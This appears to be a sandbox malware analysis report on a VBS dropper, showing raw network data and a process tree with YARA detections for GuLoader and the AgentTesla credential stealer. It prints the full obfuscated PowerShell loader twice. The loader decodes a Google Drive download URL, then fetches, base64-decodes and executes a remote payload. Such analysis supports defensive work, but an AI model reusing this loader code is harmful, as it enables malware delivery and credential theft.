                                                                          2024-04-24 04:46:59 UTC1255INData Raw: 61 d3 fc 3c 3f 73 20 bc 3f 6c f9 5d 76 81 b7 42 b6 85 3c 2a db be 9e 11 0c b2 93 8c 9b ad 3b 63 60 eb c2 ce 1c c8 03 f8 48 8d 37 58 c4 d6 20 c4 a4 92 f2 9e 2d 38 1d 90 3e 0e 75 5c 83 ad cf 09 e0 46 25 42 c0 f4 bf e0 67 55 ec 2a ea 3d f5 ef 65 8f 28 34 56 6a b1 57 8a a8 f8 45 91 72 cb 01 6d 1d d7 5e 1c 42 46 ab aa e2 a8 e8 7b ed 44 6a 21 47 2b 32 90 28 44 01 33 ed d2 40 2f a3 4e c5 31 97 8c c6 b2 dc c9 48 2a cb fa f9 9f 5e 70 75 11 bb 92 86 dc 96 82 ca f2 e0 5b 33 57 ad 88 af 8d 43 a2 7a 56 52 a5 48 59 15 fe 43 f1 13 0d a5 dd 85 12 b0 0f b6 8a 33 d8 72 e9 59 67 10 44 1c 94 65 26 86 3f ae 7c 55 8d 16 77 f7 8f 10 c1 9d 7e 4a 80 a9 6b ac eb 1a e5 c0 bd 77 b3 89 26 94 05 9c 62 66 74 de 42 45 d8 ce 88 ca b7 36 d4 49 75 c5 9c ad a4 33 f3 2c d5 c6 8d da cb 2e 56
                                                                          Data Ascii: a<?s ?l]vB<*;c`H7X -8>u\F%BgU*=e(4VjWErm^BF{Dj!G+2(D3@/N1H*^pu[3WCzVRHYC3rYgDe&?|Uw~Jkw&bftBE6Iu3,.V
                                                                          2024-04-24 04:46:59 UTC1255INData Raw: df 2a 15 4b d6 2b 8b e8 02 a4 b6 5e dc b4 9f ce f4 c8 15 3a 6e f9 13 da ad fd c2 61 df f5 4e eb af 9d 0e 97 e2 6f 2a 1e b5 9e be 4a 56 2d c3 eb 51 78 b3 05 e1 ba 9d f1 ec 45 39 e7 ba 92 6e 66 7f 29 ab 6e e5 2b 48 2e 3b 4b c0 25 ca 2b b9 d8 aa 47 67 6e 59 85 fb 29 f8 6a 68 af 71 f9 32 49 1c c2 01 fe 56 bd dc cd e7 72 61 55 de b3 59 c9 c4 06 97 d1 74 f9 6f 34 9d 88 1a d1 85 b4 a6 5d b1 30 e4 45 82 e5 c8 ee 36 7a 88 64 c8 3f 3c 48 1b fb d1 92 11 d4 ac e9 7a 81 fc 1d 85 ec ca 1d 3a d0 d7 b2 56 9f 7d 0b d0 41 34 8d 18 b3 ca ce 20 26 36 e7 b5 4f 29 50 37 45 52 1a 13 8f 0e c8 67 5e 8f 10 d1 89 38 1f 52 8b 64 77 1e 75 29 d7 7f 89 7e 02 5f 57 d0 ef 13 4f 09 ab 71 d2 90 19 f0 75 13 bd 01 fa d1 3a 99 ea 25 0b e1 31 61 7f f1 be 0c 78 7c 4c 72 a8 8e 3c c1 7b 4f db c1
                                                                          Data Ascii: *K+^:naNo*JV-QxE9nf)n+H.;K%+GgnY)jhq2IVraUYto4]0E6zd?<Hz:V}A4 &6O)P7ERg^8Rdwu)~_WOqu:%1ax|Lr<{O


                                                                          Target ID:1
                                                                          Start time:06:46:03
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
                                                                          Imagebase:0x7ff70f220000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:06:46:03
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. 
Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. 
V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. 
');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. 
');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
                                                                          Imagebase:0x7ff760310000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:06:46:04
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff70f010000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:06:46:06
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
                                                                          Imagebase:0x7ff6f0380000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:06:46:14
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. 
Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. 
V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. 
');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. 
');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
                                                                          Imagebase:0xba0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1847193868.000000000ACC4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1835301736.00000000059E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:06:46:15
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
                                                                          Imagebase:0xc50000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:06:46:42
                                                                          Start date:24/04/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                          Imagebase:0x40000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:22
                                                                          Start time:06:47:13
                                                                          Start date:24/04/2024
                                                                          Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                          Imagebase:0x5f0000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          • Detection: 0%, Virustotal
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:06:47:13
                                                                          Start date:24/04/2024
                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                          Imagebase:0x7ff787cc0000
                                                                          File size:71'680 bytes
                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

